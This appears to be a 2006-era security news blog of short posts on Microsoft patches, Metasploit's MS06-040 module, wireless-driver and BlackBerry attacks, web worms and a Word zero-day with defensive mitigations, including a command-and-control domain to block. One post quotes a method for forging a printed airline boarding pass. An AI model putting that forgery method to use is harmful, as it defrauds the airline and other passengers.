Metasploit has proof of concept code for exploiting MS06-040. The countdown to the worm begins.

Exploit Module: netapi_ms06_040 [MetaSploit.com]

Wired has a story out of DefCon picturing Blackberries as the perfect backdoor into your corporate network. Since many cop orations inherently trust the blackberry straight in through their firewalls, it might be worth a read.

The program, called proxy, has to be placed on a Blackberry either physically or as a Trojan horse delivered by e-mail. Once installed, it causes the Blackberry to call back to the attacker’s system in the background, opening a communications channel between the attacker and the company’s internal network.

Details are sketchy, and I can’t find the mentioned “documents on its website” or get to their website at all, but the fact that he says he’ll release the app in the next week or so doesn’t make me feel all warm and fuzzy.

Blackberry a Juicy Hacker Target [Wired]

The guys at Black Hat are demonstrating some interesting attacks against the device drivers for the wireless card in a MacBook Pro:

The video shows Ellch and Maynor targeting a specific security flaw in the Macbook’s wireless “device driver,” the software that allows the internal wireless card to communicate with the underlying OS X operating system.

This highlights an emerging trend of attacks against device drivers. Should attacks like this become a trend I suspect we’ll see the following:

• Wireless Cards Hit First: Many attacks focused on Wireless cards, and not just because they are remotely accessible. The fact that there’s only a couple of chipset manufacturers will make attacks easier. Especially considering this:
  

  After the demo, Ellch … will talk about a new tool he’s developing that can remotely scan and figure out the chipset and driver version of a wireless device on a target computer. So far, Ellch said the tool currently recognizes 13 different wireless device drivers, breaking them down by operating system and firmware version.

  “I’m getting this tool to the point where it can tell you not only how many people in a room are running, say, Centrino or Broadcom devices, but that ‘x’ number are running them on a Windows box with a specific version of the driver,” Ellch said. “The userful thing for that information is that if you have a device driver exploit and it’s version-specific, you could tweak [the exploit] before you launch it.”

• Homogenous Environments Hit Hardest: As demonstrated Macs will be easier targets, But think about other homogenous environments: Corporate networks whole use all the same PCs (or maybe just all the same nibs), ISPs that use all the same kind of DSL/Cable Modems, etc…
• Mitigates Slow to Come: There won’t be patches coming out of Windows Update for many of these. Expect longer windows of vulnerability and traditional mitigations like firewalls to prove ineffective.

So what do we do? Assuming the attack involves over running a buffer, some sort of kernel-level buffer overflow protection in a Host Intrusion Prevention-type product seems to be in order. The whole article is worth a read. Share your thoughts by leaving a comment below.

Hijacking a Macbook in 60 Seconds or Less [Security Fix]

A how-to on boarding early on Southwest…

…Use any HTML editor to change the “B” or “C” graphic on your saved boarding pass to the “A” graphic that you saved.

Not rocket science, but points out the inherent insecurity of boarding passes you print out yourself. I suspect it’s similarly easy with other airlines. Recently, Southwest filed suit against APassOnly.com which acted as a proxy to get you first in line boarding, so I don’t expect this site to stay up long.

How To Change A Southwest Airlines Boarding Pass From a “C” or “B” to and “A”! [boardfast.blogspot.com]

The seems to be a rash of news reports lately about vulnerabilities in Vista. Maybe it’s a quick way to grab a headline, to beat up the product that promises a better security model but has been delayed infinitely. The attacks are interesting, and reinforce that no new OS will be a fix-all for our security issues.

However, keep in mind that these tests are being run against a beta, and Microsoft has already fixed a number of the issues. I say let them hack away, after all isn’t that part of why Microsoft made the beat public?

Hacking the Vista Kernel [Dark Reading]

Symantec criticizes Vista’s User Account Control technology [ARS Technica]

eWeek Columnist Larry Seltzer looks to find out why domain names he searches for mysteriously get registered hours after he looks them up. Seems they are exploiting weaknesses in the privacy of Whois searches:

I decided to run some tests, so I picked three names out of the air and checked them with the CNet Domain Search page including myfuzzycat.com and lickmynose.com.

I let the matter go and about 30 hours later I checked with a separate whois service and determined that the domains belonged to Chesterton Holdings.

I’ve never had this happen to me, but it’s a disturbing trend.

Whois Hijacking My Domain Research? [eWeek]

McAfee claims to have “accidentally” patched a major vulnerability in their EPO management server agents.

“We did not realize that we had fixed a security vulnerability until eEye alerted us to the problem last week,” Viega said. “We were optimizing the system, not looking for security vulnerabilities.” The optimization included changing from storing data in files to storing it in memory, which removed the flaw, he said.

It’s bad enough when security vendors have vulnerabilities in their product. It’s even worse when they don’t realize there were fixing a flaw.

Of course the real irony is that eEye is a McAfee competitor. If only McAfee had a division that discovers vulnerabilities in applications… Oh wait, they do.

McAfee fixes flaw–without realizing it [ZDnet]

July brings fixes for 18 vulnerabilities bundled in 7 patches. July also makes the official end of security support for all Windows 9x products. Let us pause and take a moment of silence for our fallen friends of old…

Now back to our regularly scheduled patch announcement:

• MS06-033 .NET 2.0 Application Folder Information Disclosure Vulnerability - “could allow an attacker to bypass ASP.Net security and gain unauthorized access to objects in the Application folders explicitly by name.” Yawn.
• MS06-034 Vulnerability in Microsoft Internet Information Services using Active Server Pages Could Lead To Remote Code Execution - - The only people who can exploit this are ones that already can upload ASP files to and IIS server. This basically makes it a privilege escalation attack, even though it uses a buffer overflow to accomplish it. Not to serious, and if you have untrusted people uploading ASP files to your web server, you have bigger problems.
• MS06-035 Vulnerability in Server Service Could Allow Remote Code Execution - This is the grand daddy of the patches, and Microsoft should create a ubber critical category for patches like this. It’s wormable, and makes a good cases for personal firewalls. Get this one out fast.
• MS06-036 Vulnerability in DHCP Client Service Could Allow Remote Code Execution - This one’s pretty critical, too. But the attacker has to be on the subnet as the victim (same switch?).
• MS06-037 Vulnerability in Microsoft Excel Could Allow Remote Code Execution - Open a malicious Excel doc and you are owned. In Office 2000, just visiting a website could do it. Already exploits in the wild.
• MS06-038 Vulnerability in Microsoft Office Could Allow Remote Code Execution - Same as 06-037, except it applies to any office doc and there’s no known exploits yet.
• MS06-039 Vulnerability in Microsoft Office Could Allow Remote Code Execution - Same as 06-038.

Get ‘um done.

Security Bulletin Summary [Microsoft]

Microsoft Patches 18 Security Flaws in Windows, Office [Security Fix]

There’s reports that there’s publically available exploit code for the following Microsoft vulnerabilities:

• MS06-024: Windows Media Player.
• MS06-025: RRAS
• MS06-027: Word remote code execution
• MS06-030: SMB Priviledge Escalation.
• MS06-032: IP Source Routing Exploit.

Let’s get ‘em patched.

More Windows Exploits Out; Hacker Wins $10K Challenge [Security Fix]

Exploits for most recent Microsoft Patches [SANS ISC]

There’s some Javascript malware worming it’s way around Yahoo! Mail. There’s not a ton of users affected, and they says they’ve put a mitigation in place. The more disturbing thing is the trend, as Michael Haisley at the SANS ISC points out:

After testing several popular web applications, we have found that several are in fact vulnerable to the very same type of exploit. Good coding practices, verifying that users are coming from an authorized form and that they are not submitting malicious code can protect developers against this type of exploit.

First MySpace, now Yahoo Mail, what’s next? As Web 2.0 sites become more functional (and complex) we’ll being seeing more and more of these kind of exploits.

Yahoo Webmail Worm on the Loose [Security Fix]

Javascript/AJAX/Worm Like Behavior [SANS ISC]

UPDATE: Information Week has a good article outlining the risks of javascript.

Looks like June will be a big Microsoft patch month:

- Nine security bulletins for Microsoft Windows, the highest maximum severity rating for these is “critical.”
- One security bulletin affecting Microsoft Exchange. The highest maximum severity rating for this is “important.”
- Two security bulletins affecting Microsoft Office. The highest maximum severity rating for these is “critical.” [emphasis added]

Included in the office patches will be fixes for the Word 0-Day Vulnerability.

June 2006 Advance Notification [Microsoft Security Response Center Blog]

If you organization is like most, there are a few Macs floating around. SANS says us that it’s one of the 20 biggest things we should be worried about. At the same time Apple has commercials touting their security over PCs. So it begs the question, “How much should you be worried about Macs?”

Let’s start with some facts:

• OS X has many great security features built in, like a Personal Firewall, Auto Updates, and File/Folder Encryption.
• OS X comes out of the box with most unnecessary services turned off and users usually don’t run as a admin level account.
• OS X is vulnerable to viruses and worms.
• People in your organization probably do store critical information on a Mac.
• Lots of vulnerabilities come out for Macs.

What should be you be doing about it? Some. Macs probably aren’t your biggest risk, but they need to be on your radar. I agree with SANS that the risk is increasing, although it’s nowhere near the top 20 things I worry about.

What should you be doing:

• Educating users that they are not immune from security issues.
• Ensuring the are configured securely with Auto Updates, Desktop FW, and Unnessary Services turned off. Just because it came out of the box this way doesn’t mean it’s still this way.

Most Mac users I know have an independent streak to them and will probably resist any “big brothering” by security group. With a little diplomacy and reasonableness you should be able to win them over.

Microsoft takes a big step to make vulnerabilities harder to exploit. In short, it’s harder to guess where the buffer for a given process will be in order overflow it.

“In short, when you boot a Windows Vista Beta 2 computer, we load system code into different locations in memory. This helps defeat a well-understood attack called ‘return-to-libc’, where exploit code attempts to call a system function,” Howard explained.

He said the job of ASLR is to move these function entry points around in memory so they are in unpredictable locations.

The article also links to a 25-page Word Doc that summarizes the new security features in Vista.

Microsoft Finds (Random) Way to Secure Vista [eWeek]

Microsoft Windows Vista Security Advancements (Word Doc) [Microsoft]

In a recent speech, MS Big-Wig Jim Allchin recounts a story of CEO Steve Ballmer trying to clean up a severely infested PC for 2 days.

Ballmer spent the better part of the next two days trying to rid this PC of worms, viruses, spyware, malware, severe fragmentation, and well, you name it. Picture it: the world’s 24th wealthiest person, a man worth $13.6 billion according to Forbes magazine, sitting at a table for two days, playing tech support. It was, Allchin says, a humbling experience.

It eventually took a MS team of engineers to clean it up. In the real world tech support would have backup the data and re-imaged it in 20 minutes. Still, I’m glad Steve got to enjoy life in the trenches for a while.

Even the Builders of Windows Find Tech Support a Challenge [ITworld]

Friday brought us yet another zero-day attack. Word has a previously unannounced hole in it that is being exploited by an email propogating worm that plants a trojan. Word 2003 and XP are definately vulnerable, there seems to be conflicting info on Word 2000. Since there’s no patch, everyone has some ideas about what you might do. Potential mitigation I’ve seen suggested include:

• Switch from MS Word to OpenOffice. (SANS ISC)
• Quarantine all attachments for 6-12 hours. (SANS ISC)
• Don’t let anyone be an admistrator on there box. (SANS ISC and Microsoft)
• Force people to run Word in “Safe Mode” (Microsoft)
• Don’t allow users to store important data on the desktop. (SANS ISC)

If you can do any of these, great. But for those of us who live in the real world, here some things you might try:

• Block Outbound traffic to the site the trojan phones home to: localhosts dot 3322 dot org. SANS says the owner has changed the IP several times, so using your DNS servers to blackhole the name may be the most effective.
• Block Word Attachments through email. People will complain and it only works until exploit changes and starts to zip word doc first.
• Latest AV signatures. Most of the vendors are calling the exploits low, so they are not turning out sigs very fast but it’s better than nothing.
• User education about not opening Word Docs from untrusted sources.
• Use advanced AV features or Host-Based IPS to block the writing of the trojan files to specific directories.
• IDS/IPS signatures to the phone-home site: localhosts dot 3322 dot org.

Link RoundUp:

News.com article
eWeek Article
Microsoft Advisory Bulletin
fSecure: Info on the Exloit, Some Background
SecurityFocus Summary

Updates:

SecuriTeam Has a Registry Hack Work Around
We’ve had (untested) reports from McAfee that the Buffer Overflow Protection in the 8.0i AV client will protect against any exploit to this vulnerability, regardless of DAT version.